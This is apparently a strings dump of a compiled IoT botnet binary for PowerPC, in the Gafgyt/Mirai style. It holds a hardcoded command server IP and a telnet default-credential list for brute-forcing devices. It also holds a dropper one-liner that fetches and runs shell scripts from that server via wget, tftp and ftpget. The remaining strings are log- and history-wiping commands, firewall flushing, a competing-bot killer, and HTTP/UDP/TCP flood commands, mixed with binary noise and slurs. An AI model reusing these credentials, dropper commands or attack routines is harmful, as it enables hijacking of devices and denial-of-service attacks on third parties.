/lib/ld-uClibc.so.0
libc.so.0
strcpy
chroot
waitpid
ioctl
sysconf
Do nine men interpret Nine men I nod
getdtablesize
recv
connect
sigemptyset
snprintf
getpid
prctl
memcpy
execl
dup2
system
malloc
sleep
socket
select
isspace
sigaddset
send
pipe
write
inet_addr
ntohl
chdir
setsockopt
strcasestr
strstr
signal
read
strncpy
htonl
sendto
bcopy
strtok
__uClibc_main
memset
srand
inet_ntoa
getppid
time
strcmp
gethostbyname
sprintf
vfork
getsockopt
htons
__errno_location
atoi
_exit
strlen
open
toupper
strchr
setsid
fcntl
close
free
sigprocmask
getsockname
_edata
__bss_start
_end
78	y
=)<o8	
:} J
:} J
:} J
}a[xN
9@I^
:} J
Cx= 
}@Sx= 
}`HP= 
:} J
:} J
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
}a[xN
}%KxH
}a[xN
}a[xN
}%KxH
}a[xN
}a[xN
HP|	
HP|	
}a[xN
}a[xN
}a[xN
}a[xN
0} Z
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
}a[xN
}a[xN
}a[xN
}%KxH
x}d[x}%KxK
}a[xN
:}#Kx8
}a[xN
x}%KxH
x}$Kx8
}a[xN
}a[xN
:} J
}a[xN
}c[x|
}c[x|
}a[xN
}a[xN
}a[xN
} HP
}a[xN
}%KxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
x}$Kx8
}a[xN
}c[x|
:} J
H0}k
}%Kx8
}g[xH
x}'KxH
}a[xN
:}ISx8	
}@SxT
}a[xN
}a[xN
} HP
} HP
} HP
} HP
} HP
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
}a[xN
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}&Kx}g[x|
}a[xN
}a[xN
>} Kx|
}a[xN
xY|`
}a[xN
}a[xN
}a[xN
w9|`
}CSx|
x}e[xH
u%|i
}a[xN
}#Kx|
x}e[xH
UV}i
p}`XP
} HP
.p} 
p}`XP
A} HP
x}h[xL
>}#Kx|
x}%KxH
tI|`
}a[xN
r-8`
sE|`
}a[xN
}CSx}d[x|
}#Kx|
x}e[xH
$} HP
p}8`
q=|`
}#Kx8
pE8`
ou|`
}%KxH
p5|i
8} J
8} J
8} J
8} J
8} J
x}$Kx8
oM|i
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
8} J
8} J
8} J
l-|`
}a[xN
}#Kx8
}%KxH
8} J
iq|k
8} J
8} J
8} J
jy|`
8} J
x}$Kx8
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}&Kx}g[xH
Beeb
8} J
8} J
f	|`
}a[xN
de|i
da|`
}%KxH
}#Kx8
:} J
`U|k
a=|`
x}$Kx8
_I|i
:} J
H0}k
}%Kx8
}g[xH
^U|`
}&Kx}g[xH
}c[x
:} J
:} J
[e|`
}c[x
:} J
:} J
ZY|`
Eleele
Y1|`
}c[x
:} J
:} J
}e[x}FSx|
W)|`
}%KxH
God A red nugget A fat egg under a dog
Ti|i
}'Kx9
x}e[x8
>}c[x|
Q1|i
}'Kx9
P!|`
>}c[x|
P!|`
}a[xN
O}|`
N!|`
My|k
x}e[x8
MU|`
LY|`
L%|`
Ka|`
KY|`
>}c[x|
}'Kx9
J%|`
>}c[x|
}a[xN
(}#Kx|
x}e[xH
H-= 
\}#Kx|
x}e[xH
@}#Kx|
x}e[xH
}%KxH
}FSx}
x}j[xL
H}FSx}
Cx}h[xL
h}e[xL
}a[xN
F	= 
}a[xN
D}|i
DY|i
D5|i
Cu|`
CY|`
C1|`
Bi|`
B	|i
Aq|`
AE|`
@i|`
?M|`
?%|`
?9|`
alula
>U|`
>)|y
==|`
=%|`
<Q8`
;a|`
;E|`
;U|`
:I|`
:1|`
:E|`
:%|`
9a8`
8U|`
89|`
8I|`
7-|`
}a[xN
}%KxH
7	= 
:} J
}c[x|
6i|`
6M|i
6%|`
x}$Kx
}a[xN
4-|`
4	|`
3M|`
x}%KxH
4U|`
3]|`
}%KxH
x}$KxH
}a[xN
098`
1I|`
/q|`
:}ISx8	
/E= 
-a|i
-Y|`
-1|`
,q|`
x}#Kx8
x}$KxH
x}$Kx8
 51.15.56.255
root
support
A Santa lives evil at NASA
telnet
admin
user
guest
admin1
administrator
Administrator
666666
888888
ubnt
tech
mother
service
supervisor
mg3500
daemon
default
operator
xc3511
vizxv
xmhdipc
juantech
123456
54321
12345
pass
admin1234
1111
smcadmin
1234
password
klv123
klv1234
Zte521
hi3518
jvbzd
anko
zlxx.
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm
fucker
merlin
aquario
1001chin
zsun1188
GM8182
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
BusyBox
uilt-in
inux
shell
help
commands
/tmp/
/var/tmp/
/bin/
/dev/
(null)
/bin/sh
:>%$#
%d.%d.%d.%d
close
keep-alive
accept
Mozilla/5.0  (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
arfgG
Tacocat
HBiug655
KJYDFyljf754
LIKUGilkut769458905
JHFDSkgfc5747694
GJjyur67458
RYSDk747586
HKJGi5r8675
KHGK7985i
yuituiILYF
GKJDghfcjkgd4
uygtfgtrevf
tyeuhygbtfvg
ewqdcftr
trbazetghhnbrty
tbhrwsehbg
twehgbferhb
etrbhhgetrb
edfverthbyrtb
kmiujmnhnhfgn
zcdbvgdfsbgfd
gdfbtsdgb
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
hackz
shdyed
http
sghwiondc
nigger
pussy
faggot
REPORT %s:%s:%s
shell
enable
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.15.56.255/sktrypc.sh; chmod 777 sktrypc.sh; sh sktrypc.sh; tftp 51.15.56.255 -c get tftpsk1.sh; chmod 777 tftpsk1.sh; sh tftpsk1.sh; tftp -r tftpsk2.sh -g 51.15.56.255; chmod 777 tftpsk2.sh; sh tftpsk2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.15.56.255 ftpskk1.sh ftpskk1.sh; sh ftpskk1.sh; rm -rf sktrypc.sh tftpsk1.sh tftpsk2.sh c; rm -rf *
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
jackmy*
busybox*
bin*
sex*
tftp*
arm*
mipsel*
mips*
mips64*
i686*
sparc*
sh4*
bot*
jackmeoff*
hackz*
bruv*
lwget
armv*
ntpd*
shitty*
jack*
ssh*
mips
mipsel
i686
i586
/dev/netslink/
/var/
/var/run/
/dev/shm/
/mnt/
/boot/
Degas are we not drawn onward no In union drawn onward to new eras aged
/usr/
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
>%s.t && cd %s ; >retrieve
pkill -9 %s
Borrow or rob
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
rm -rf /var/log/wtmp
history -c;history -w
rm -rf /tmp/*
history -c
rm -rf ~/.bash_history
rm -rf /bin/netstat
history -w
pkill -9 busybox
pkill -9 perl
service iptables stop
/sbin/iptables -F;/sbin/iptables -X
HTTP
HTTP %s Flooding %s:%d for %d seconds
BOTKILL
[BOTKILLER] [STARTED] [%s]
HOLD
JUNK
CNC <target> <port> <time>
8.8.8.8
/proc/net/route
	00000000	
gucci
PING
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.interp
.hash
.dynsym
.dynstr
.rela.plt
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.dynamic
.data
.got
.sdata
.sbss
.bss
.comment
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.3069
p.3067
__do_global_dtors_aux
call___do_global_dtors_aux
object.3150
frame_dummy
call_frame_dummy
initfini.c
libc/sysdeps/linux/powerpc/crti.S
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/powerpc/crtn.S
libc/sysdeps/linux/powerpc/crt1.S
new.c
i.4237
printchar
prints
printi
print
fdopen_pids
hextable
C.127.5592
C.126.5591
C.133.5658
C.376.6759
C.375.6758
C.374.6757
_DYNAMIC
_GLOBAL_OFFSET_TABLE_
chroot
strcpy
recvLine
waitpid
ioctl
sysconf
getdtablesize
contains_fail
recv
connect
numpids
sigemptyset
initConnection
sendTCP
snprintf
getRandomPublicIP
usernames
read_until_response
zprintf
getpid
getHost
wildString
prctl
memcpy
makeRandomStr
getRandomIP
execl
sendHTTP
sclose
trim
dup2
system
malloc
sleep
__dso_handle
tcpcsum
reset_telstate
fdpclose
socket
select
isspace
sigaddset
makeIPPacket
sockprintf
send
_init
parseHex
pipe
csum
write
inet_addr
ntohl
__deregister_frame_info
ourIP
chdir
connectTimeout
setsockopt
sendSTD
tmpdirs
strcasestr
_start
strstr
init_rand
rand
signal
read
_SDA_BASE_
strncpy
htonl
RemoveTMP
sendto
currentServer
bcopy
strtok
fork
gotIP
__uClibc_main
lilpvmp
processCmd
__bss_start
getOurIP
get_telstate_host
memset
main
listFork
negotiate
srand
sendUDP
inet_ntoa
getppid
time
fdpopen
botkiller
strcmp
advances2
data_start
matchPrompt
gethostbyname
advance_state
_fini
contains_success
sprintf
fdgets
socket_connect
fails
vfork
scanPid
rand_cmwc
advances
getsockopt
contains_string
contains_response
_edata
_end
htons
__errno_location
uppercase
exit
sendJUNK
atoi
successes
GucciGang
_exit
szprintf
strlen
open
toupper
strchr
__data_start
setsid
_Jv_RegisterClasses
macAddress
readUntil
fcntl
read_with_timeout
__register_frame_info
close
passwords
sendHOLD
mainCommSock
pids
sendCNC
free
sigprocmask
getsockname
